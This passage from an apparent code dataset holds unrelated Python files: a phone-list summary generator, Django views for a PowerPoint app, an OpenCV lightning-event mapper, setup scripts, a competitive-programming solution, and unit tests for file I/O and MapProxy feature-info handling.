PHONES_DIRECTORY,\n)\n\n\ndef _wiki_name_and_transcription_level(ele: List[str]) -> str:\n return ele[3] + ele[4]\n\n\ndef _handle_wiki_name(\n language: Dict[str, Any], file_path: str, modifiers: List[str]\n) -> str:\n name = language[\"wiktionary_name\"]\n for modifier in modifiers:\n if modifier in language:\n key = file_path[\n file_path.index(\"_\") + 1 : 
file_path.rindex(\"_phone\")\n ]\n if not key:\n logging.info(\n \"Failed to isolate key for %r modifier in %r\",\n modifier,\n file_path,\n )\n continue\n values = language[modifier][key]\n if \"|\" in values:\n values = values.replace(\" |\", \",\")\n name += f\" ({values})\"\n return name\n\n\ndef main() -> None:\n with open(LANGUAGES_PATH, \"r\", encoding=\"utf-8\") as source:\n languages = json.load(source)\n readme_list = []\n languages_summary_list = []\n modifiers = [\"dialect\"]\n for file_path in os.listdir(PHONES_DIRECTORY):\n # Filters out README.md.\n if file_path.endswith(\".md\") or file_path.endswith(\"tsv\"):\n continue\n with open(\n f\"{PHONES_DIRECTORY}/{file_path}\", \"r\", encoding=\"utf-8\"\n ) as phone_list:\n # We exclude blank lines and comments.\n num_of_entries = sum(\n 1\n for line in phone_list\n if line.strip() and not line.startswith(\"#\")\n )\n iso639_code = file_path[: file_path.index(\"_\")]\n transcription_level = file_path[\n file_path.index(\"phone\") : file_path.index(\".\")\n ].capitalize()\n wiki_name = _handle_wiki_name(\n languages[iso639_code], file_path, modifiers\n )\n row = [\n iso639_code,\n languages[iso639_code][\"iso639_name\"],\n wiki_name,\n transcription_level,\n num_of_entries,\n ]\n languages_summary_list.append([file_path] + row)\n readme_list.append([f\"[phone]({file_path})\"] + row)\n # Sorts by Wiktionary language name, with phonemic entries before phonetic\n # ones.\n languages_summary_list.sort(key=_wiki_name_and_transcription_level)\n readme_list.sort(key=_wiki_name_and_transcription_level)\n with open(PHONES_SUMMARY_PATH, \"w\", encoding=\"utf-8\") as sink:\n tsv_writer_object = csv.writer(\n sink, delimiter=\"\\t\", lineterminator=\"\\n\"\n )\n tsv_writer_object.writerows(languages_summary_list)\n # Writes the README.\n with open(PHONES_README_PATH, \"w\", encoding=\"utf-8\") as sink:\n print(\n \"See the [HOWTO](HOWTO.md) for the steps to generate phone lists.\",\n file=sink,\n )\n print(\n \"| Link | ISO 639-2 Code | ISO 639 Language Name \"\n \"| Wiktionary Language Name \"\n \"| Phonetic/Phonemic | # of phones |\",\n file=sink,\n )\n print(\n \"| :---- | :----: | :----: | :----: | :----: | :----: |\",\n file=sink,\n )\n for link, code, iso_name, wiki_name, ph, count in readme_list:\n print(\n f\"| {link} | {code} | {iso_name} | {wiki_name} | {ph} \"\n f\"| {count:,} |\",\n file=sink,\n )\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(\n format=\"%(filename)s %(levelname)s: %(message)s\", level=\"INFO\"\n )\n main()\n","sub_path":"data/phones/lib/generate_phones_summary.py","file_name":"generate_phones_summary.py","file_ext":"py","file_size_in_byte":3720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"548627259","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\n\nurlpatterns = patterns('',\n \n url(r'^$', 'dw_app.views.index', name='home'),\n url(r'^data/$', 'dw_app.views.get_data', name='data'),\n\n url(r'^admin/', include(admin.site.urls)),\n)\n","sub_path":"dw_project/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"355418419","text":"import csv\nimport os.path\nimport numpy as np\nimport cv2 as cv\nfrom time import sleep\n\nimg = cv.imread('/home/kyleasti/Documents/ASTI/ftptest/PotekaOpenCVMapper/smallPoteka.jpg',1)\noverlay = img.copy()\noutput = img.copy()\nalpha = 0.05\n\n#stations 
= ['00173455','00173456','00173457','00173458','00173459','00174722','00174723','00174724','00174725','00174726','00174727','00174728','00174729','00174730','00174731','00174732','00174733','00174734','00174735','00181271','00181272','00181274','00181283','00181284','00181285','00181286','00181287','00181288','00181289','00181290','00181291','00181292']\nstations = {'00173456': {'location':'MMDA EFCOS', 'city':'Pasig City', 'xCoords':365,'yCoords':324},\n '00173457': {'location':'ASTI', 'city':'Quezon City', 'xCoords':339,'yCoords':239},\n '00173458': {'location':'Tapayan Pumping Station', 'city':'Rizal', 'xCoords':412,'yCoords':424},\n '00173459': {'location':'San Andres Pumping Station', 'city':'Manila', 'xCoords':226,'yCoords':350},\n '00174722': {'location':'De La Salle Araneta University', 'city':'Malabon','xCoords':211,'yCoords':198},\n '00174723': {'location':'MMDA Catmon', 'city':'Malabon', 'xCoords':139,'yCoords':199},\n '00174724': {'location':'Brgy. Elias Aldana', 'city':'Las Pinas', 'xCoords':181,'yCoords':538},\n '00174725': {'location':'Brgy. Punturin', 'city':'Valenzuela','xCoords':198,'yCoords':75},\n '00174726': {'location':'Las Pinas Science High School', 'city':'Las Pinas', 'xCoords':189,'yCoords':613},\n '00174727': {'location':'Brgy. Ugong', 'city':'Valenzuela', 'xCoords':229,'yCoords':116},\n '00174728': {'location':'MMDA Balut Pumping Station', 'city':'Manila', 'xCoords':162,'yCoords':269},\n '00174729': {'location':'CAAP', 'city':'Pasay','xCoords':223,'yCoords':471},\n '00174730': {'location':'DOST Compound', 'city':'Bicutan Taguig','xCoords':303,'yCoords':516},\n '00174731': {'location':'Brgy. Bagbaguin', 'city':'Valenzuela', 'xCoords':218,'yCoords':123},\n '00174732': {'location':'RED Training Center', 'city':'Pasig','xCoords':353,'yCoords':371},\n '00174733': {'location':'Dr. Filemon HS', 'city':'Las Pinas','xCoords':232,'yCoords':605},\n '00174734': {'location':'VCDRRMO Bldg', 'city':'Valenzuela', 'xCoords':161,'yCoords':158},\n '00174735': {'location':'PAGASA Science Garden', 'city':'Quezon City', 'xCoords':288,'yCoords':246},\n '00181271': {'location':'Quezon City High School', 'city':'Quezon City','xCoords':276,'yCoords':268},\n '00181272': {'location':'TUP Taguig', 'city':'Taguig','xCoords':276,'yCoords':482},\n '00181274': {'location':'E. 
Library, Technological College', 'city':'Pateros','xCoords':332,'yCoords':403},\n '00181283': {'location':'Bayanan Elementary School', 'city':'Muntinlupa','xCoords':304,'yCoords':651},\n '00181284': {'location':'C3 Bldg.', 'city':'Mandaluyong','xCoords':273,'yCoords':359},\n '00181285': {'location':'Xavier School', 'city':'San Juan','xCoords':283,'yCoords':315},\n '00181286': {'location':'Anabu 1-B', 'city':'Imus Cavite','xCoords':115,'yCoords':678},\n '00181287': {'location':'Unibersidad de Manila', 'city':'Manila', 'xCoords':185,'yCoords':334},\n '00181288': {'location':'Centennial Park', 'city':'Navotas', 'xCoords':129,'yCoords':234},\n '00181289': {'location':'MMDA Libertad PS', 'city':'Pasay', 'xCoords':196,'yCoords':418},\n '00181290': {'location':'RAVE Pasig City', 'city':'Pasig','xCoords':381,'yCoords':367},\n '00181291': {'location':'Greenheights Subdivision', 'city':'Paranaque','xCoords':247,'yCoords':545}}\n #'00181292': {'location':'Quezon City Science High School', 'city':'Quezon City', 'xCoords':266,'yCoords':219}}\n\n\n\nevents = {'000000':[]} #Dictionary for storing events in a single day\ndaysOfEvents = {}\npathString =\"/home/kyleasti/Documents/ASTI/ftptest/PotekaOpenCVMapper/P-Poteka Files/Jan 4 0843AM\"\n\ndayStart = 20200116\ndayEnd = 20200129\nnumberOfDays = dayEnd - dayStart\nprint(numberOfDays)\n\n\n#print(os.path.join(pathString,stations[0],'Plate'))\ndef convertMonth(month):\n if(month=='01'):\n return 'January'\n elif(month=='02'):\n return 'February'\n elif(month=='03'):\n return 'March'\n elif(month=='04'):\n return 'April'\n elif(month=='05'):\n return 'May'\n elif(month=='06'):\n return 'June'\n elif(month=='07'):\n return 'July' \n elif(month=='08'):\n return 'August'\n elif(month=='09'):\n return 'September'\n elif(month=='10'):\n return 'October'\n elif(month=='11'):\n return 'November' \n elif(month=='12'):\n return 'December'\n\ndef convertToHumanTime(strikeTime):\n year = strikeTime[1:5]\n month = convertMonth(strikeTime[5:7])\n day = strikeTime[7:9]\n hour = strikeTime[9:11]\n minute = strikeTime[11:13]\n second = strikeTime[13:15]\n finishedString = month+' '+day+' '+year+' '+hour+':'+minute+':'+second\n return(finishedString)\n\ndef retrieveStationsToDraw(events):\n listOfStations=[]\n for event in events:\n currentStation = event['stationID']\n if currentStation not in listOfStations:\n listOfStations.append(currentStation)\n return listOfStations\n\n\n\n\ndef rowToEventData(row):\n data = {'stationID':row[0],'datetime':row[3],'startTime':row[6],'endTime':row[7],'peakAtStart':row[8],'peakAtEnd':row[9],'gpsStatus':row[10]}\n return data\n\ndef pretty(d, indent=0):\n for key, value in d.items():\n print('\\t' * indent + str(key))\n if isinstance(value, dict):\n pretty(value, indent+1)\n else:\n print('\\t' * (indent+1) + str(value))\n\ndef draw_events(event,x,y,flags,param):\n \n if event == cv.EVENT_LBUTTONDBLCLK:\n for hr in range(24):\n stringHr=str(hr)\n if(hr<10): stringHr = '0'+stringHr\n for minute in range(60):\n stringMin=str(minute)\n if(minute<10): stringMin = '0'+stringMin\n for sec in range(60):\n stringSec = str(sec)\n if(sec<10): stringSec = '0'+stringSec\n currentDateTime=stringHr+stringMin+stringSec\n entireDateTime='\\''+daySelected+currentDateTime+'\\'' \n if currentDateTime not in events:\n None\n else:\n #print('at '+convertToHumanTime(entireDateTime)+ ' there were '+ str(len(events[currentDateTime])) +' events')\n stationsToDraw=retrieveStationsToDraw(events[currentDateTime])\n 
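# at least one station logged an event at this timestamp, so look up those stations and draw each one\n                        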
#print(str(retrieveStationsToDraw(events[currentDateTime])))\n for station in stationsToDraw:\n print(station)\n currentDict = stations.get(station)\n if 'eventCount' not in currentDict:\n currentDict['eventCount']=1\n else:\n currentDict['eventCount']+=1\n stationX=currentDict['xCoords']\n stationY=currentDict['yCoords']\n currentEventCount=currentDict['eventCount']\n print('Station has had '+ str(currentEventCount)+' number of events')\n #stationX=stations.get(station)['xCoords']\n #stationY=stations.get(station)['yCoords']\n if currentEventCount*2 < 255:\n cv.circle(overlay,(stationX,stationY),35,(0,165,currentEventCount*2),-1)\n else: cv.circle(overlay,(stationX,stationY),35,(0,165,255),-1)\n cv.putText(overlay, str(currentDict['eventCount']),(stationX-5, stationY+3), cv.FONT_HERSHEY_SIMPLEX, .5, (255, 255, 255), 2)\n cv.putText(overlay, str(currentDict['location']),(stationX-10, stationY+16), cv.FONT_HERSHEY_SIMPLEX, .3, (255, 255, 255), 1)\n cv.waitKey(50)\n\n\n \n \n cv.addWeighted(overlay, alpha, output, 1 - alpha,0, output)\n #cv.putText(output, convertToHumanTime(entireDateTime),(10, 30), cv.FONT_HERSHEY_SIMPLEX, .7, (0, 0, 255), 3)\n #cv.imshow('Output',output)\n cv.putText(output, convertToHumanTime(entireDateTime),(10, 30), cv.FONT_HERSHEY_SIMPLEX, .7, (255, 255, 255), 2)\n cv.imshow('Output',output)\n cv.waitKey(10)\n \n \n #print('sample of events list: ' + str(events[currentDateTime]))\n #print('x: '+str(x)+ ' y: '+str(y))\n\n\n\n\n#Agorithm for scanning CSV directories\nfor day in range(numberOfDays):\n daySelected = str(dayStart+day)\n for station in stations:\n directory=os.path.join(pathString,station,'Plate')\n print(directory)\n print(stations.get(station)['city'])\n for root,dirs,files in os.walk(directory):\n for file in files:\n if file.endswith(\".csv\"):\n if daySelected in file:\n fileDir = os.path.join(directory,file)\n with open(fileDir, 'r') as csvfile:\n csv_reader = csv.reader(csvfile, delimiter=',')\n line_count = 0\n cityStrike = stations.get(station)['city']\n for row in csv_reader:\n #print('Lightning Strike Happened at '+convertToHumanTime(repr(row[3]))+ ' near ' + station['city'] + ' at '+ station['location'])\n #print(rowToEventData(row))\n currentEvent = rowToEventData(row)\n currentTime = currentEvent['datetime'][8:14]\n #print('time is:' +currentTime)\n arr = []\n arr.append(currentEvent)\n if currentTime not in events:\n events[currentTime] = arr\n else: \n events[currentTime].append(currentEvent) #Append current lightning event to dictionary for date\n daysOfEvents[daySelected] = events #Append current date to group of days of events\n events = {'000000':[]} #reset event dictionary\nprint(str(daysOfEvents))\n\n #pretty(events)\n\n #print('Row0: ' +row[0]+' Row1: '+row[1]+' Row2: '+row[2]+' Row3: '+row[3]+' Row4: '+row[4]+ ' Row5: '+row[5]+ ' Row6: '+row[6]+ ' Row7: '+row[7]+ ' Row8: '+row[8]+ ' Row9: '+row[9]+ ' Row10: '+row[10]+ ' Row11: '+row[11])\n\nfor day in range(numberOfDays):\n daySelected = str(dayStart+day)\n print('Number of lightning events at '+ convertToHumanTime('\\''+daySelected+'000000\\'')+ ': ' +str(len(daysOfEvents[daySelected])))\n\n#for hr in range(24):\n# stringHr=str(hr)\n# if(hr<10): stringHr = '0'+stringHr\n# for minute in range(61):\n# stringMin=str(minute)\n# if(minute<10): stringMin = '0'+stringMin\n# for sec in range(61):\n# stringSec = str(sec)\n# if(sec<10): stringSec = '0'+stringSec\n# currentDateTime=stringHr+stringMin+stringSec\n# entireDateTime='\\''+daySelected+currentDateTime+'\\'' \n# if currentDateTime not 
in events:\n# None\n# else:\n #print('at '+convertToHumanTime(entireDateTime)+ ' there were '+ str(len(events[currentDateTime])) +' events')\n# print(str(retrieveStationsToDraw(events[currentDateTime])))\n #print('sample of events list: ' + str(events[currentDateTime]))\n# print(' ')\n\ncv.namedWindow('image')\n#cv.setMouseCallback('image',draw_events)\n\nwhile(1):\n cv.imshow('image',img)\n if cv.waitKey(20) & 0xFF == 27:\n break\ncv.destroyAllWindows()\n\n\n","sub_path":"lightningPeriod.py","file_name":"lightningPeriod.py","file_ext":"py","file_size_in_byte":12305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"197112142","text":"from setuptools import setup, find_packages\nimport re\n\nwith open(\"tenkin/__init__.py\", encoding=\"utf8\") as f:\n version = re.search(r'__version__ = \"(.*?)\"', f.read()).group(1)\n\nsetup(\n name=\"Tenkin\",\n version=version,\n author=\"Luan Viana\",\n packages=find_packages(),\n package_data={'': [\n './static/html/index.html',\n './static/css/style.css',\n './static/js/main.js',\n './static/js/service-worker.js',\n './static/json/manifest.json',\n './static/python/main.py',\n './static/assets/favicon.ico',\n './static/assets/logo192.png',\n './static/assets/logo512.png',\n ]\n },\n include_package_data=True,\n install_requires=[\n \"click>=5.1\",\n \"uvicorn>=0.13.1\",\n \"beautifulsoup4>=4.9.3\",\n ],\n)","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"308149315","text":"for _ in range(int(input())):\n n,k,d = map(int, input().split())\n arr = list(map(int, input().split()))\n mem = {}\n for j in range(d):\n try:\n mem[arr[j]]+=1\n except:\n mem[arr[j]] = 1\n ans = len(mem.keys())\n temp = ans\n i = 0\n j = d\n\n while(j<n):\n if arr[j] in mem:\n if mem[arr[j]]==0:\n temp+=1\n mem[arr[j]]+=1\n else:\n mem[arr[j]] = 1\n temp+=1\n mem[arr[i]]-=1\n if mem[arr[i]]==0:\n temp-=1\n ans = min(ans,temp)\n j+=1\n i+=1\n print(ans) \n \n","sub_path":"codeforces/1247/B1.py","file_name":"B1.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"412585096","text":"import io\nimport builtins\n\nfrom unittest.mock import patch\nfrom unittest.mock import MagicMock\n\nfrom mt_shared import mt_io\n\n\ndef test_read_file_non_user_expand():\n\n file_name = '/path/2/file_name.txt'\n mock_content = io.StringIO('some text')\n\n mock = MagicMock(return_value=mock_content)\n with patch('builtins.open', mock):\n mt_io.read_file(file_name)\n\n mock.assert_called_with(file_name, 'r')\n\n\n@patch('mt_shared.mt_io.os.path.expanduser')\ndef test_read_file_with_user_expand(mock_expand):\n\n file_name = '~/file_name.txt'\n expanded_file_name = '/full/expanded/path/2/file_name.txt'\n mock_content = io.StringIO('some text')\n mock_content.read = MagicMock()\n mock_expand.return_value = expanded_file_name\n\n mock = MagicMock(return_value=mock_content)\n with patch('builtins.open', mock):\n mt_io.read_file(file_name)\n\n mock.assert_called_with(expanded_file_name, 'r')\n mock_content.read.assert_called_once()\n\n\n@patch('mt_shared.mt_io.os')\ndef test_write_file_non_user_expand(mock_os):\n\n data = 'data 2 write'\n file_name = '/path/2/file_name.txt'\n mock_stream = io.StringIO('some text')\n mock_stream.write = MagicMock()\n\n mock = MagicMock(return_value=mock_stream)\n with 
patch('builtins.open', mock):\n mt_io.write_file(file_name, data)\n\n mock.assert_called_with(file_name, 'w')\n mock_stream.write.assert_called_with(data)\n\n\n@patch('mt_shared.mt_io.os')\ndef test_write_file_with_user_expand(mock_os):\n\n file_name = '~/file_name.txt'\n data = 'data to write to the file'\n expanded_file_name = '/full/expanded/path/2/file_name.txt'\n mock_content = io.StringIO('some text')\n mock_os.path.expanduser.return_value = expanded_file_name\n\n mock = MagicMock(return_value=mock_content)\n with patch('builtins.open', mock):\n mt_io.write_file(file_name, data)\n\n mock.assert_called_with(expanded_file_name, 'w')\n\n\n@patch('mt_shared.mt_io.os')\n@patch('mt_shared.mt_io._get_file_name')\ndef test_write_file_writes_directory(mock_gfn, mock_os):\n\n full_fn = '/Usr/whatever/file_name.txt'\n mock_content = io.StringIO('some text')\n mock_gfn.return_value = full_fn\n\n mock = MagicMock(return_value=mock_content)\n with patch('builtins.open', mock):\n mt_io.write_file('~/file_name.txt', 'data')\n\n dirname = mock_os.path.dirname.return_value\n mock_os.path.dirname.assert_called_with(full_fn)\n mock_os.makedirs.assert_called_with(dirname, exist_ok=True)\n\n@patch('mt_shared.mt_io.os.path.isfile')\n@patch('mt_shared.mt_io._get_file_name')\ndef test_exists(mock_gfn, mock_isfile):\n\n file_name = 'full/path/to/file.txt'\n is_file_result = 'YES IT IS DA FILE'\n mock_isfile.return_value = is_file_result\n\n result = mt_io.exists(file_name)\n\n assert result == is_file_result\n\n\n@patch('mt_shared.mt_io.os.path.isfile')\n@patch('mt_shared.mt_io._get_file_name')\ndef test_exists_expands_path(mock_gfn, mock_isfile):\n\n file_name = 'full/path/to/file.txt'\n is_file_result = 'YES IT IS DA FILE'\n mock_isfile.return_value = is_file_result\n\n result = mt_io.exists(file_name)\n\n mock_isfile.assert_called_with(mock_gfn.return_value)\n\n\n\n\n\n\n","sub_path":"mt-shared/tests/test_mt_io.py","file_name":"test_mt_io.py","file_ext":"py","file_size_in_byte":3165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"162912558","text":"import sys\n# PATH = \"/home/simon/Documents/NAIVI/\"\nPATH = \"/home/simfont/NAIVI/\"\nsys.path.append(PATH)\nimport numpy as np\nimport torch\nfrom sims_mcmc.main import main\n\nimport os\nos.environ[\"XDG_CACHE_HOME\"] = \"/home/simfont/scratch/.cache/\"\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) > 1:\n which = int(sys.argv[1])\n seed = np.array([which % 10])\n ps = np.array([[0, 50][which // 10]])\n name = f\"mcmc_1000_{which}\"\n else: # no argument = run all\n seed = np.arange(0, 10, 1)\n ps = np.array([0, 50])\n name = \"mcmc_1000_all\"\n print(seed, ps)\n torch.set_default_dtype(torch.float64)\n main(\n path=PATH + \"sims_mcmc/\",\n name=name,\n explore_dict={\n \"data.N\": np.array([1000]),\n \"data.K\": np.array([2]),\n \"data.p_bin\": np.array([0]),\n \"data.p_cts\": ps,\n \"data.missing_mean\": np.array([-10000.]),\n \"data.seed\": seed,\n \"data.alpha_mean\": np.array([-1.85]),\n \"data.mnar_sparsity\": np.array([0.0]),\n \"fit.algo\": [\"MCMC\"],\n \"fit.n_sample\": np.array([0]),\n \"fit.mcmc_n_sample\": np.array([1000]),\n \"model.alpha_mean\": np.array([-1.85]),\n \"model.K\": np.array([2]),\n \"model.mnar\": [False]\n }\n )\n","sub_path":"sims_mcmc/job_mcmc_1000.py","file_name":"job_mcmc_1000.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"564934136","text":"# This file is part 
of the MapProxy project.\n# Copyright (C) 2011 Omniscale <http://omniscale.de>\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import with_statement\n\nimport os\nimport tempfile\n\nfrom lxml import etree, html\nfrom nose.tools import eq_\n\nfrom mapproxy.featureinfo import (combined_inputs, XSLTransformer,\n XMLFeatureInfoDoc, HTMLFeatureInfoDoc)\nfrom mapproxy.test.helper import strip_whitespace\n\ndef test_combined_inputs():\n foo = '<a><b>foo</b></a>'\n bar = '<a><b>bar</b></a>'\n\n result = combined_inputs([foo, bar])\n result = etree.tostring(result)\n eq_(result, b'<a><b>foo</b><b>bar</b></a>')\n\n\nclass TestXSLTransformer(object):\n def setup(self):\n fd_, self.xsl_script = tempfile.mkstemp('.xsl')\n xsl = b\"\"\"\n <xsl:stylesheet version=\"1.0\"\n xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\">\n <xsl:template match=\"/\">\n <root>\n <xsl:apply-templates select='/a/b'/>\n </root>\n </xsl:template>\n <xsl:template match=\"/a/b\">\n <foo><xsl:value-of select=\"text()\" /></foo>\n </xsl:template>\n </xsl:stylesheet>\"\"\".strip()\n open(self.xsl_script, 'wb').write(xsl)\n\n def teardown(self):\n os.remove(self.xsl_script)\n\n def test_transformer(self):\n t = XSLTransformer(self.xsl_script)\n doc = t.transform(XMLFeatureInfoDoc('<a><b>Text</b></a>'))\n eq_(strip_whitespace(doc.as_string()), b'<root><foo>Text</foo></root>')\n\n def test_multiple(self):\n t = XSLTransformer(self.xsl_script)\n doc = t.transform(XMLFeatureInfoDoc.combine([\n XMLFeatureInfoDoc(x) for x in\n [b'<a><b>ab</b></a>',\n b'<a><b>ab1</b><b>ab2</b><b>ab3</b></a>',\n b'<a><b>ab1</b><c>ac</c><b>ab2</b></a>',\n ]]))\n eq_(strip_whitespace(doc.as_string()),\n strip_whitespace(b'''\n <root>\n <foo>ab</foo>\n <foo>ab1</foo><foo>ab2</foo><foo>ab3</foo>\n <foo>ab1</foo><foo>ab2</foo>\n </root>'''))\n eq_(doc.info_type, 'xml')\n\n\nclass TestXMLFeatureInfoDocs(object):\n def test_as_string(self):\n input_tree = etree.fromstring('<root></root>')\n doc = XMLFeatureInfoDoc(input_tree)\n eq_(strip_whitespace(doc.as_string()),\n b'<root/>')\n\n def test_as_etree(self):\n doc = XMLFeatureInfoDoc('<root>hello</root>')\n eq_(doc.as_etree().getroot().text, 'hello')\n\n def test_combine(self):\n docs = [\n XMLFeatureInfoDoc('<root><a>foo</a></root>'),\n XMLFeatureInfoDoc('<root><b>bar</b></root>'),\n XMLFeatureInfoDoc('<other_root><a>baz</a></other_root>'),\n ]\n result = XMLFeatureInfoDoc.combine(docs)\n\n eq_(strip_whitespace(result.as_string()),\n strip_whitespace(b'<root><a>foo</a><b>bar</b><a>baz</a></root>'))\n eq_(result.info_type, 'xml')\n\n\nclass TestXMLFeatureInfoDocsNoLXML(object):\n def setup(self):\n from mapproxy import featureinfo\n self.old_etree = featureinfo.etree\n featureinfo.etree = None\n def teardown(self):\n from mapproxy import featureinfo\n featureinfo.etree = self.old_etree\n\n def test_combine(self):\n docs = [\n XMLFeatureInfoDoc(b'<root><a>foo</a></root>'),\n XMLFeatureInfoDoc(b'<root><b>bar</b></root>'),\n XMLFeatureInfoDoc(b'<other_root><a>baz</a></other_root>'),\n ]\n result 
= XMLFeatureInfoDoc.combine(docs)\n\n eq_(b'<root><a>foo</a></root>\\n<root><b>bar</b></root>\\n<other_root><a>baz</a></other_root>',\n result.as_string())\n eq_(result.info_type, 'text')\n\nclass TestHTMLFeatureInfoDocs(object):\n def test_as_string(self):\n input_tree = html.fromstring('<p>Foo')\n doc = HTMLFeatureInfoDoc(input_tree)\n assert b'<body><p>Foo</p></body>' in strip_whitespace(doc.as_string())\n\n def test_as_etree(self):\n doc = HTMLFeatureInfoDoc('<p>hello</p>')\n eq_(doc.as_etree().find('body/p').text, 'hello')\n\n def test_combine(self):\n docs = [\n HTMLFeatureInfoDoc(b'<html><head><title>Hello<body><p>baz</p><p>baz2'),\n HTMLFeatureInfoDoc(b'<p>foo</p>'),\n HTMLFeatureInfoDoc(b'<body><p>bar</p></body>'),\n ]\n result = HTMLFeatureInfoDoc.combine(docs)\n assert b'<title>Hello' in result.as_string()\n assert (b'
<body><p>baz</p><p>baz2</p><p>foo</p><p>bar</p></body>
' in\n result.as_string())\n eq_(result.info_type, 'html')\n\n def test_combine_parts(self):\n docs = [\n HTMLFeatureInfoDoc('
<p>foo</p>
'),\n HTMLFeatureInfoDoc('
<body><p>bar</p></body>
'),\n HTMLFeatureInfoDoc('Hello<body><p>baz</p><p>baz2'),\n ]\n result = HTMLFeatureInfoDoc.combine(docs)\n\n assert (b'<body><p>foo</p><p>bar</p><p>baz</p><p>baz2</p></body>' in\n result.as_string())\n eq_(result.info_type, 'html')\n\nclass TestHTMLFeatureInfoDocsNoLXML(object):\n def setup(self):\n from mapproxy import featureinfo\n self.old_etree = featureinfo.etree\n featureinfo.etree = None\n def teardown(self):\n from mapproxy import featureinfo\n featureinfo.etree = self.old_etree\n\n def test_combine(self):\n docs = [\n HTMLFeatureInfoDoc(b'<html><head><title>Hello<body><p>baz</p><p>baz2'),\n HTMLFeatureInfoDoc(b'<p>foo</p>'),\n HTMLFeatureInfoDoc(b'<body><p>bar</p></body>'),\n ]\n result = HTMLFeatureInfoDoc.combine(docs)\n\n eq_(b\"<html><head><title>Hello<body><p>baz</p>\"\n b\"<p>baz2\\n<p>foo</p>\\n<body><p>bar</p></body>\",\n result.as_string())\n eq_(result.info_type, 'text')\n","sub_path":"mapproxy/test/unit/test_featureinfo.py","file_name":"test_featureinfo.py","file_ext":"py","file_size_in_byte":6337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"72595543","text":"# Always prefer setuptools over distutils\ntry:\n from setuptools import setup\nexcept ImportError:\n from distutils.core import setup\n\nwith open('requirements.txt') as f:\n required = f.read().splitlines()\n\nsetup(\n name='shapley-effects',\n version='0.1',\n description='Estimation of Shapley effects for Sensitivity Analysis of Model Output.',\n long_description=open('README.md').read(),\n url='https://gitlab.com/CEMRACS17/shapley-effects',\n author='Nazih BENOUMECHIARA & Kevin ELIE-DIT-COSAQUE',\n author_email = 'nazih.benoumechiara@gmail.com',\n license='MIT',\n keywords=['sensitivity analysis', 'shapley', 'effects', 'depedencies'],\n packages=['shapley'],\n install_requires=required\n)","sub_path":"pypi_install_script/shapley-effects-0.1.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"247142518","text":"from django.shortcuts import render_to_response, get_object_or_404\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.template import RequestContext\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import Http404\nfrom django.conf import settings\n\nimport os\nimport random\n\nfrom ppt.models import *\nfrom ppt.forms import *\n\n\n#########\n# General\n#########\n\n\ndef homepage(request):\n user = request.user\n\n return render_to_response('ppt/index.html',\n { 'user': user,\n },\n context_instance=RequestContext(request))\n\n\n\n#########\n# Users\n#########\n\n\n@login_required\ndef user_list(request):\n users = User.objects.all()\n \n return render_to_response('ppt/user_list.html',\n {'users': users}, context_instance=RequestContext(request)\n )\n\n\n@login_required\ndef user_view(request, username=False):\n if not username:\n username = request.user\n\n user = get_object_or_404(User, username=username)\n \n ppts = Ppt.objects.filter(user_id=user.id).order_by('pk')\n \n return render_to_response('ppt/user_view.html',\n { 'user': user,\n 'ppts': ppts\n },\n context_instance=RequestContext(request)\n )\n\n\n##############\n# PowerPoints\n###############\n\n@login_required\ndef user_ppt_view(request, username, ppt_id):\n user = get_object_or_404(User, username=username)\n ppt = Ppt.objects.get(user_id=user.id, id=ppt_id)\n \n return 
render_to_response('ppt/user_ppt_view.html',\n { 'user': user,\n 'ppt': ppt,\n },\n context_instance=RequestContext(request)\n )\n\n\n\n# Note that this both uploads new files and allows edits.\n@login_required\ndef user_ppt_edit(request, username, ppt_id=False):\n user = User.objects.get(username=request.user)\n\n print(ppt_id)\n\n if not ppt_id == False:\n ppt = get_object_or_404(Ppt, id=ppt_id)\n else:\n ppt = Ppt(user=user, title='', description='')\n\n if request.method == 'POST':\n pptForm = PptForm(request.POST, request.FILES, instance=ppt)\n if pptForm.is_valid():\n ppt = pptForm.save()\n return HttpResponseRedirect(ppt.get_absolute_url())\n else:\n pptForm = PptForm(instance=ppt)\n \n return render_to_response('ppt/user_ppt_edit.html',\n {'user': user, 'form': pptForm},\n context_instance=RequestContext(request)\n )\n\n\n#########\n# Units\n#########\n\n@login_required\ndef unit_list(request):\n units = PptUnit.objects.all()\n \n return render_to_response('ppt/unit_list.html',\n {'units': units}, context_instance=RequestContext(request)\n )\n\n\n@login_required\ndef unit_view(request, unit_id):\n unit = get_object_or_404(PptUnit, id=unit_id)\n \n return render_to_response('ppt/unit_view.html',\n {'unit': unit}, context_instance=RequestContext(request)\n 